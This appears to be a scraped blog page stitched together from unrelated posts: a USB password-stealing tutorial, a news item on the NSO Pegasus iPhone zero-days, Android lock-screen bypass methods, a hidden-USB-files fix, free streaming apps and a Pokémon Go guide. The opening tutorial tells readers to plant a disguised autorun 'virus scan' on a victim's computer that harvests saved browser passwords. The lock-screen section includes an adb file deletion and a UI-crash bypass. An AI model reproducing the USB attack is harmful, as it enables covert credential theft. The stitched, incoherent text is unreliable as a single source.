How to Make USB Hacking Device That Can Steal Passwords From Victims Computer:
NOTE:this is for only educational purposes and aware people from this kind of hackings do not try this after cyber crime bill thanks
This is a very important tutorial, in this tutorial I am going to show you that how to make a Portable Hacking device with a Pendrive that can hack most of the online passwords from victims computer and with the help of this program you can also help your friends and relatives to recover their forgotten passwords, Yes you heard it right after following this tutorial you can hack like a pro and the tutorial is very easy.
Anyone who has a basic computer knowledge can do this tutorial Easily. During the time of tutorial if you find any queries then please feel free to ask us by simply commenting in the comment box and we will get to you asap.
Things You Need:
1. Pen Drive
2. Computer/Laptop
3. Web Browser Pass View(Download)
Step 1: Download Web Browser Pass views Zip file from the above link
Step 2: Insert your Pendrive to your Computer and then Quick Format It as NTFS
Step 3: Create a New Folder in your Pendrive and name the folder as “USB” and then Extract the Web Browser Passview zip file into the USB folder.
Step 4: Open a Notepad and then copy the things written below and then Save the File AsUSB Driver.bat
Step 5: Open a Notepad and then copy the things written below and then Save the File AsAutorun.inf
[autorun] open=usbdriver.bat Action=Perform a virus Scan
Step 6: Copy both the file Autorun.inf and USBdriver.bat into your pen drive.
Step 7: Insert it into your Victims computer and you will see that after inserting it will ask for Performing a Virus Scan and then tap yes and after tapping you will get a screen Like this, just tap ctrl+a and then Ctrl+s and save the file to your pen drive, do it fast, Now open that Notepad file that you have saved, Voila, you got the passcodes of your friend.
Note: Sometimes the Autorun File doesn’t work in that criteria, you have to open the pen drive partition and then double click on Usb Driver and after that just tap ctrl+a and then Ctrl+s and save the file to your pen drive. Make sure that you are doing it fast.
Please Don’t Misuse this hack, Help your friends, relatives to recover their passcodes from this program.
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Hackers can remotely hijack your iPhone with a simple text message:
An Israeli firm is selling iOS zero-days which allows hackers to remotely hijack of your iPhone
If you own an iPhone, update it right now even as you read this article because it can be hacked using three zero-days. According to news reports, an Emirati human rights activist named Ahmed Mansoor’s iPhone was hacked using one of the three zero-days an. Mansoor reportedly received an SMS message which promised new details of torture in the country’s state prisons, along with a link to follow if he was interested. If Mansoor had followed the link, it would have jailbroken his phone on the spot and implanted it with malware, capable of logging encrypted messages, activating the microphone and secretly tracking its movements.
The zero-days are reportedly being sold to world governments and authorities by an Israeli cyber security company called NSO Group. In fact, NSO Group is so secretive that it repeatedly changes its name to avoid undue exposure.
The incident came to light when Security company Lookout and internet watchdog group Citizen Lab investigated the cyber attack on Mansoor’s iPhone and found it to be the product of NSO Group, a “cyber war” organization based in Israel that’s responsible for distributing a powerful, government-exclusive spyware product called Pegasus.
Both the companies immediately notified Apple about the serious zero-days which NSO Group was selling and Apple immediately rolled out a patch for three previously unknown zero-day exploits that were used to target the iPhone 6 of Mansoor.
The vulnerabilities, known as “zero days” because they were previously unknown to Apple, give the hackers total access to an iPhone through a spear-phishing text message. Those text messages were designed to mimic the types of message a user might receive from a legitimate site, said the security researchers. Among those impersonated to get users to click on the links: the Red Cross, Facebook, Google, and even the Pokémon Company. Once clicked, the message downloaded malware, which gave the attackers total access to the phone.
“We were made aware of this vulnerability and immediately fixed it with iOS 9.3.5,” Apple said in a statement. “We advise all of our customers to always download the latest version of iOS to protect themselves against potential security exploits.”
The Citizen Lap report states that other NSO Group zero-day targets include activists and journalists in Yemen, Turkey, Mozambique, Mexico, Kenya, and the UAE.
Kindly update your iPhone/iPad to the latest version to avoid falling prey to such an attack. If you are somehow unable to update your iPhone/iPad kindly avoid clicking on even trusted links till your device is patched.
You Can Bypass Android’s Secured Lock Screen In These 7 Ways
To prevent unwanted access to your phone such as keeping strangers (or friends) from checking out your messages or private pictures, it always sensible to enable certain security measures. The most commonly used security measures in Android smartphones are the pattern lock, the personal identification number (PIN) or password.
But what happens if you forget the pattern, PIN, or password that locks your Android device? Don’t panic. Fortunately, Android provides several different methods to bypass the lock screen and get back in a locked Android smartphone or tablet. However, unfortunately, there’s not one method that works for all devices.
Given below are the most effective 7 methods that should hopefully get you back into your device.
Method 1: Use Android Device Manager (ADM)
A service called Android Device Manager is probably the best solution for newer Android smartphones and tablets. You can use any device or computer to access the service, as long as you are logged into your Google account, which is available available at this link.
Once ADM gets a fix on your device, start by clicking the “Lock” button. If the service is having problems to locate your device, then click your browser’s refresh button a few times, and if your phone is compatible it should get connected within 5 attempts.
You will be prompted to enter a new password after you click the “Lock” button. This will replace the pattern, PIN, or password that you have forgotten. To confirm your selection, type the new password and then click the “Lock” button.
It may take up to 5 minutes for the password to change over from here. However, once it does, you should be able to enter the new password to unlock your device.
Method 2: Use Samsung’s ‘Find My Mobile’ Service
A similar service to ADM called Find My Mobile should be the first thing that you should try if you have a Samsung device. You can use any web browser to go to this link and log into your Samsung account. Unfortunately, this method will not work, if you have never set up a Samsung account. Also, you need to keep in mind that some carriers like Sprint, lock out this service.
Click the “Lock my screen” button in the left-hand pane once you have logged into your Samsung account. Enter a new PIN in the first field from here, and then click the “Lock” button near the bottom of the screen. Your lock screen password should be changed to the PIN you just entered within a minute or two that you can use to unlock your device.
Method 3: Use The ‘Forgot Pattern’ Feature
Try using the “Forgot Pattern” feature if your device is running Android 4.4 or lower. After 5 failed unlock attempts, you will see a message that says “Try again in 30 seconds.” Tap the button at the bottom of the screen that says “Forgot Pattern”, while this message is showing.
Select “Enter Google account details” (you may go directly to this option depending on your device), then enter your primary Gmail account and password.
Google will either send you an email with your unlock pattern, or you can change it right then and there.
Method 4: Perform A Factory Reset
Normally, a factory reset of the phone should work in almost any situation, if you are more worried about getting into your phone rather than saving any data stored on it.
Based on your device type, the process will differ. However, for most phones, you can start by switching the device completely off. Press and hold the volume down and power buttons at once when the screen goes black. This will prompt Android’s bootloader menu. Press the volume down button twice to highlight the “Recovery mode” option, and then press the power button to choose it.
Next, your phone should enter the recovery mode the moment you hold the power button down and tap the volume up button once. Then use the volume buttons to highlight the “Wipe data/factory reset” option, and press the power button to choose it.
Once the process is over, choose the “Reboot system now” option and you should no longer be locked out of your phone.
Method 5: Use ADB To Delete The Password File
If you have enabled USB debugging on your phone in the past, only then will this option work on your phone. Further, it will only work along with the aforementioned option only if you have allowed the computer you are using to connect via ADB. If you meet these requirements, then it’s a seamless way to unlock your device.
First, connect your phone to your computer with a USB data cable. Then, open a command prompt window in your ADB installation directory. Type the following command, and hit Enter.
• adb shell rm /data/system/gesture.key
Next, reboot your phone and the secure lock screen should be gone, letting you to access your phone. But note that this is only temporary. Therefore, before you reboot again, ensure that you have set a new pattern, PIN, or password for your phone.
Method 6: Boot InTo Safe Mode To Bypass Third-Party Lock Screen
Booting into safe mode is the simplest way to get around, if the lock screen you are trying to bypass is a third-party app rather than the stock lock screen.
You can boot into safe mode by bringing up the power menu from the lock screen for most of the phones, and then long-press the “Power off” option. When asked if you would like to boot into safe mode, select “OK” and when the process gets over, your third-party lock screen app will be temporarily disabled.
Next, just clear data on the third-party lock screen app or uninstall it, then reboot your phone to get back out of safe mode. The troublesome lock screen app should be gone when you get back up.
Method 7: Crash The Lock Screen UI
In the end, there is a way to get around the password lock screen, if your device is encrypted and running Android 5.0-5.1.1. This method will not work on any other type of secure lock screen, but it is a rescuer if you forgot your password.
First, hit the “Emergency Call” option on your lock screen, then enter 10 asterisks using the dialer interface. To highlight the entered text, double-tap the field and select “Copy,” then paste it into the same field to basically double the amount of entered characters. To add more characters, repeat the same process of copying and pasting until double-tapping the field no longer highlights the characters.
Next, return to the lock screen and open the camera shortcut. Pull down the notification shade and tap the Settings icon, then you will be prompted to enter a password. Long-press the input field and select “Paste,” then repeat this process numerous times. Finally, your lock screen will crash after you have pasted enough characters into the field, which will allow you to access the rest of your phone’s interface
Sometimes it happens that the USB shows the space occupied but does not show the data placed in it. It only shows the shortcuts of every file placed or existing in it. If this is the problem then I have got the solution for it right here. Follow the steps and the problem is solved.
Step-1: Firstly scan the drive by means of any anti-virus. I would personally recommend MICROSOFT SECURITY ESSENTIALS for windows. If you don't have it, you can download it from the following link Download Microsoft Security Esssentials Step-2:Click on "Start" -->Run --> type cmd and click on OK.
Here I assume your External hard drive as G:
Step-3:Enter this command. attrib -h -r -s /s /d g:\*.* where g:\ is the name of the external drive. You can change it according to the destination.
While loading this command close your drive for sometime so that the processing may take place speedily.
You can copy the above command --> Right-click in the Command Prompt and paste it. Note : Replace the letter g with your External hard drive lette
People have been saying that the best things in life are free for a long time, but it's only now we live in the app era that I've started to truly believe it. For example, there's a huge number of apps that let you stream movies and TV shows for free on Android. We've gathered the best of them together for you here.
The Android SPB TV app is not region-specific and offers content from around the world via a selection of weird and wonderful stations. From the NASA channel to Comedy for Women, this app gives you a pretty healthy mix of content.
You won't find the latest Hollywood blockbuster, NBC or Showtime on SPB TV, but if you want to take a chance on a wild card, this is the app to use. A few of the stations definitely appear to be of a more adult nature (how you choose to use that information is up to you).
For your anime needs, it's hard to beat Toonmania, which offers a huge selection of the dubbed cartoons. Everything is easily navigable thanks to the app's clean and intuitive layout, and you can browse shows sorted by popularity or most recently added. There's also an exhaustive list of filters, so you can narrow down your search to find exactly what you're looking for.
This app isn't available from the Play Store, but if you head to mobi24, you can download the APK file. Just makes sure you head to Settings > Lock screen and security and enable Unknown sources before trying to install the file. Once you're done you'll have access to everything in the library.
Another excellent Anime streaming app is Crunchyroll. And this one is available through Google Play. It has a huge selection of the best Anime available free. The app is quite popular with over five million downloads and gets a decent rating.
Running the app is quite simple. Just browse through your favorite shows and they will run with subtitles. The default is English so you won't have to mess with the language. You'll have to watch some advertisements but mostly for the premium service it offers. Basically, you're paying $4.99 so you won't have to watch Crunchyroll advertisements.
FilmOn streams a broad range of channels from around the world live, as well as a variety of classic/B-movies; mostly a bizarre but entertaining mix of horror and Kung Fu movies. But the sports channels are the most impressive. You can check out some pretty interesting live events on this app.
FilmOn is a free service supported by ads and doesn't have the same clout as Netflix or even Hulu, but the live TV streams work well, and it's a great option for streaming a number of well-known channels. Make sure you browse for a while and see what's available, you may be surprised at what you can find.
Pokémon Go is now officially out in more than 30 countries. Here's how to get started on your real-world Pokémon journey.
The mobile game, which lets you catch Pokémon in augmented reality as you explore the world around you, has begun rolling out to Google Play and the App Store in certain countries.
In preparation for your own Pokémon journey, WIRED has tips on what to expect from the game and how to play.
First Steps
Despite shifting to phones from handheld games consoles,Pokémon Go feels very familiar if you've ever played a core series game before. You'll meet the newest Pokémon Professor, Professor Willow, who'll guide you on your way and explain the world of Pokémon.
First though, you'll name and customise your character. You can choose male or female avatars, and choose their skin tone and some other basic aesthetic features. You'll also pick out an outfit – there are essentially three complete costumes, but the parts can be mixed and matched to create a more individual look. You'll level up as a Pokémon Trainer as you progress, which makes more Pokémon available for capture and allows you to take on gym battles.
Be warned: once you've customised your avatar, you cannot change your selections so choose wisely.
The actual gameplay tutorial is fairly brief. Willow gives you a Pokéball and sends you off to catch your first Pokémon – one of the original starter trio from the original Pokémon Red and Blue, Bulbasaur, Charmander, or Squirtle – and introduces you to the basic mechanics. This is also your first chance to check out theaugmented reality feature of the game, which places your target Pokémon into your surroundings, using your phone's camera. Flick a Pokéball in their direction and they're yours, but future captures won't be so easy.
How to get Pikachu as a starter
The team at Polygon has discovered a way to bypass the original trio and select Pikachu as a starter in Pokémon Go instead.
Instead of selecting Bulbasaur, Charmander, or Squirtle, walk away from the trio to make them disappear. If you are able to repeat this four times, they return with Pikachu. However, as Polygon explained, this can be difficult. Polygon's full instructions can be found here.
YouTube channel Game Informer has also released a video tutorialon how to achieve this.
Catch 'em All
The method of catching Pokémon is probably the biggest difference between Pokémon Go and the core games. While you'll still encounter them in the wild, you won't actually battle them or whittle their health down. Instead, successful capture is determined by the Pokémon's level, the type of Pokéball used, and even your throwing technique. If you're playing with AR switched on, you'll also want to centre the critter in the screen as best you can, and keep your phone steady for improved results. AR isn't mandatory though – if you play without, you'll simply have an entirely digital encounter.
The Pokémon you encounter will depend on where you are in the real world. Walk along a canal or river, and you'll encounter more water-types; a park might yield more grass-types. Quite where you'll meet some of the more exotic types, such as psychic, we haven't quite figured out yet.
Evolving your Pokémon
Fans of the show will know that certain characters can be evolved either once or twice. Charmander, for example, can evolve into Charmeleon and then into Charizard and with each evolution, their moves and special moves evolve too.
To evolve your characters in Pokémon Go, you'll need to collect Candies and Stardust. Every capture you make increases your Stardust, but you need to catch the same character multiple times to get character-specific Candies. For example, each time you catch Charmander you'll get three Charmander candies and you need 50 to evolve into Charmeleon.
You can't use candies from one character to evolve another. You can also get more Candies by transferring individual Pokémon back to Professor Willow, but this only produces one candy per transfer.
Below each Pokémon on their respective information page is a Stardust gauge, the number of Candies you have as well as their special moves. In addition to using Stardust to evolve your Pokémon, it can also be used to boost a character's combat points (CP).
Keep in mind that rarer Pokémon – particularly starters – will be much harder to evolve purely on the basis of scarcity.
Selecting Pokémon to transfer
Ultimately, a Pokémon's CP gives it its strength, but you also need to consider its health points (HP) and the points next to their special moves. CP can be boosted using Stardust, but the move points are harder to change to it's better to have more accurate or powerful moves and then a higher CP than transfer Pokémon based purely on lower CP. When you power up a Pokémon, this also increases the character's HP.
How to use a Pokéstop
Pokémon Go uses landmarks in your vicinity to create Pokéstops and Pokémon Gyms, and everything from national monuments to local curiosities can be a discovery in the game.
Walk along the street, and a nearby plaque or historical object can serve as a Pokéstop. These appear as cubes until you are close enough to use them. Once close enough, the cube becomes a circle and selecting it shows you landmark that is plotted by this Pokéstop
This image becomes a spinning marker. Spin the marker until its blue colour becomes a light purple and it releases Pokéballs. As you move through the levels, you can also collect Potions, Revive tokens, Lure modules, Razz Berries and Great Balls among other gifts.
How to use and battle at Gyms
Gyms are different to Pokéstops. Although they're placed in the real world like Pokéstops, they can't be challenged until you reach Pokémon Trainer level five. At this point you will also be asked to pick a team – Team Mystic, Team Valor and Team Instinct – which are blue, red and yellow respectively.
Gyms offer the only form of Pokémon battles in the game, pitting you against a rival's team. There aren't any moves to select either – victory is determined by your Pokémon's Combat Power (CP), while fights themselves involve tapping to attack and swiping to dodge.
That said, certain attacks are better against certain Pokémon.
The majority of Gyms will have already been claimed by a team and you can determine which team currently occupies that Gym because they are colour-coded, either red, blue or yellow. If the Gym is white, it means it isn't currently occupied or is between owners.
Tapping on a gym will reveal which team currently controls it, what level it is and how many Pokémon are guarding it. The name of the gym is shown along the top.
Below the picture of the gym is a number and this relates to its strength, or 'prestige'. The higher the right-hand number, the more powerful it is and the harder it is to beat. You will then see the Pokèmon that are defending the gym, including their name and their CP as well as the trainer's name in the top right-hand corner. Swiping the screen will reveal how many Pokémon currently occupy that gym and gyms can hold up to 10 at a time. You have to defeat all Pokémon in a gym to take it over.
You don't have to battle against rival teams, however. You can battle at friendly Gyms with people on the same team colour. This will help boost the prestige of your team's Gym. Battling at rival Gyms lowers its prestige until its weak enough to be taken over. The higher the level of prestige a gym has, the more Pokémon it can hold and you can check the prestige level by selecting a gym and Once your team owns a Gym, you have the option to leave a Pokemon behind at your team's gym to aid in its defence. This will remove it from your Pokédex and place it in the line-up at the Gym until it is defeated. The longer you are in the Gym, the better your endurance and you will be rewarded with PokéCoins to increase your strength and Defender bonuses.
Using incense and Lures
Players can either buy incense or collect them from Pokéstops. The same applies for Lures. Incense can be placed around you to attract Pokémon to your vicinity and lasts 30 minutes. This will move as you move and only you can see it.
Lures can be placed around nearby Pokéstops and they appear as glittering purple and blue markers which any player can see. To add a Lure, select a nearby Pokéstop, go to your Items list – by selecting the Pokéball on the app's map page – and select the Lure module. Modules can be found in Pokéstops, bought, or awarded to you when you level up.
Revive, Potions and Razz Berries
As you level up, catching Pokémon will be trickier. It may take a couple of attempts, especially if the Pokémon's Combat Points (CP) are particularly high. You can increase your chances by feeding them Razz Berries.
After a battle in the gym, your Pokémons' Health Points (HP) will drop. Click on damaged Pokémons and use either a Revive token or a Potion to boost their health.
Revive is a medicine that can revive fainted Pokémon. It also restores half of a fainted Pokémon's maximum HP.
A Potion is a spray-type medicine for treating wounds. It restores the HP of one Pokémon by 20 points.
Eggs and catching rare Pokémon
Certain Pokéstops release eggs. These eggs contain a number of rare Pokémons but they need to be incubated. Every player gets an incubator that can be used infinite times. You can also collect or buy additional incubators.
When you collect an egg, they sit in a separate tab in the Pokémon menu. Under each egg is a distance – 2km, 5km or 10km. This is how long you need to walk for these eggs to hatch. However, the walking 'timer' only begins when the egg is in an incubator and kilometres only count if the app is open as you walk.
This can be a big drain on battery. To combat this problem, Niantic has included a battery saving mode in the settings menu – select it and the screen will black out when the phone is being held by a player's side or in their pockets.
If you put your phone onto Vibrate or Loud mode, you can also hold the phone by your side (with the app open) and be notified when a Pokémon appears in your vicinity. This will spare you from constantly looking at your phone and put you less at risk of muggers, for example.
There are also companies who will do the legwork, literally, for you. Fantastic Services, for example, is currently offering a service in which someone will walk the 10km needed to hatch certain eggs for you. They will also collect eggs, Pokéballs and other goodies from Pokéstops along the way for a fee. This does mean handing your phone over to a stranger, though, which may not be preferable.
Count the PokéPennies
Pokémon Go is free-to-play, but it does include microtransactions. Virtual Pokécoins are sold at the following rates:
Coins are then spent on items, including extra Pokéballs that you'll need to actually catch Pokémon you encounter, support items such as incense to attract rarer creatures, eggs that hatch into new Pokémon, and upgrades for both your item backpack and Pokémon storage. Although you get proportionally more coins the more real-world money you spend, just shy of £80 is a lot to ask for the highest tier package.
To buy items, select the Pokéball icon on the app's map page and go to Shop. Scroll down to buy Pokécoins to add them to your account. The total number of coins is shown in the top right-hand corner. You can then use these coins to buy items.
If you are shown an error message about your account being 'too full' it means you have too many balls, potions, revives, eggs and so in your virtual bag. You can either remove these items to free up space, or pay to expand the capacity of your bag.
To remove items, go to the Pokéball, Items and hit the trash can icon next to each item. From here you can select how many of each item you want to remove from your bag.
The game isn't a complete cash-grab, though. Like most free-to-play titles, Pokémon Go can provide everything you need without parting with cash - it just requires a bit of patience. Every Pokéstop you reach provides free items when you activate it, and although the selection is entirely random, it's the easiest and cheapest way to restock your supplies.
Power Through
Or: remember to bring a back up battery. Between GPS location tracking, an active screen, and generating augmented reality creatures to capture, Pokémon Go is a power-hog. While the beta was absolutely monstrous in this regard – we went through a full charge in roughly three hours – the final version is only somewhat improved, with gamers in New Zealand and the US still reporting significant battery drainage after only short periods of play. Niantic is aware of the issue, saying "we are working on a solution".
In the meantime, the only real option for a lengthy play session is to carry a power bank for your device. Depending on the form factor, it could prove fiddly to hold both, but it's currently the best way to avoid your phone dying while you try to catch a Rattata. Failing that, the nation's coffee shops can soon expect Pokémon battles of a different sort as players start dropping in to recharge over a latte. Just don't forget your charger.
Wear Sunscreen
Not just good life advice - Pokémon Go is is intrinsically an outdoor, active game, and that means you'll be exposed to the elements while you hunt down the Pokémon in the world around you.
Obviously, many players will be playing Pokémon Go in small bursts inbetween their daily routines, but for anyone planning to dedicate a chunk of time to playing, they should factor in some basic preparations that don't quite apply when you're battling the Elite Four in Pokémon games on your 3DS. You'll be walking a lot, and while that's good for health reasons - you'll rapidly hit 10 to 12k steps on the hunt - you'll want comfortable shoes to do so. You'll also want actual sunscreen on hot days (we got slightly burnt ourselves) and appropriate weather protection otherwise.
Also, be considerate of people around you, and pay attention to where you are. While the game is already a hit, not everyone will appreciate you stopping suddenly in the street to visit a Pokéstop or take on a Gym Battle. Like Ingress, Niantic's other GPS-enabled explorathon game, part of Pokémon Go's charm is in discovering the hidden cultural artifacts around you. To really enjoy the game, stop for a minute and appreciate where it's taken you, before ploughing ahead on filling your Pokédex.